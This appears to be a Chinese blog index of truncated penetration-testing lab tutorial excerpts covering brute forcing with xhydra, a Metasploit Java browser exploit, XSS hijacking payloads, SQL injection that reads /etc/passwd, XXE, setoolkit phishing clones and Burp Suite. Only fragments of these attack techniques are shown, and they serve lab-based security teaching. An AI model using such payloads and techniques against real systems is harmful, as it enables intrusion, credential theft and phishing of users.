1.1 xhydra介绍 本质上和hydra是没有区别的。暴力破解软件的要素: IP，用户名，端口号，字典，调一下暴力破解的进程数加快速度。 1.2 xhydra使用 1.2.1 启动xhydra [cce lang='bash']# xhydra[/...

1.1.1 基于java漏洞获取shell 1.1.1.1 生成攻击链接 [cce lang='bash']msf6 > search jre17[/cce] [cce lang='bash']msf6 > use exploit/multi/browser/java_jre17_driver_manager [*] No...

1.1 反射型XSS攻击劫持用户浏览器 1.1.1 构造攻击payload [cce lang='bash']<script> window.onload = function() { var link= document.getElementsByTagName('a'); for(j = 0; j < l...

1.1 SQL注入读写文件 1.1.1 读取文件 在MySQL中读取文件，使用load file('文件路径/名称') 测试URL：http://192.168.10.159/sqli-labs/Less-1/?id=-1' union select 1, load_file('/etc/passwd'...

1.1 XXE漏洞介绍 XXE（XML External Entity Injection）XML外部实体注入。 XML是一种类似于HTML（超文本标记语言）的可扩展标记语言，是用于标记电子文件使其具有结构性的标记语言，可以用来标...

1.1 持久性XSS窃取用户信息 1.1.1 制作钓鱼网站 使用setoolkit克隆站点，setoolkit是一个万能的社工工具(社会工程学工具集合) [cce lang='bash']# setoolkit Do you agree to the terms of serv...

1.1 SQL注入方法 1.1.1 报错注入 ORDER BY关键词用于对记录集中的数据进行排序。 用法1：按某个字段进行排序，语法： [cce lang='bash']select字段1,字段2 from表名order by字段名;[/cce] 用法2...

1.1 Kali启动社区版burpsuite 1.2 启动专业版burpsuite 1.2.1 Linux版 专业版需要使用命令启动： [cce lang='bash']# burp[/cce] 1.2.2 Windows版 1.3 配置浏览器代理 1.3.1 Firfox 1.4 截取数...

1.1 实验环境 序号 主机IP 主机系统 主机角色 1 192.168.10.180 Kali 攻击机 2 192.168.10.129 Windows 10 64位 攻击机 3 192.168.10.156 Windows 7 32位 被攻击机 4 192.168.10.159 Centos 7 6...

1.1 POST表单注入 1.1.1 使用burpsuite进行表单提交注入 1.1.1.1  burpsuite开启截断 打开http://192.168.10.159/sqli-labs/Less-11/ 后开启burpsuite截断： 1.1.1.2  提交表单信息 用户名密...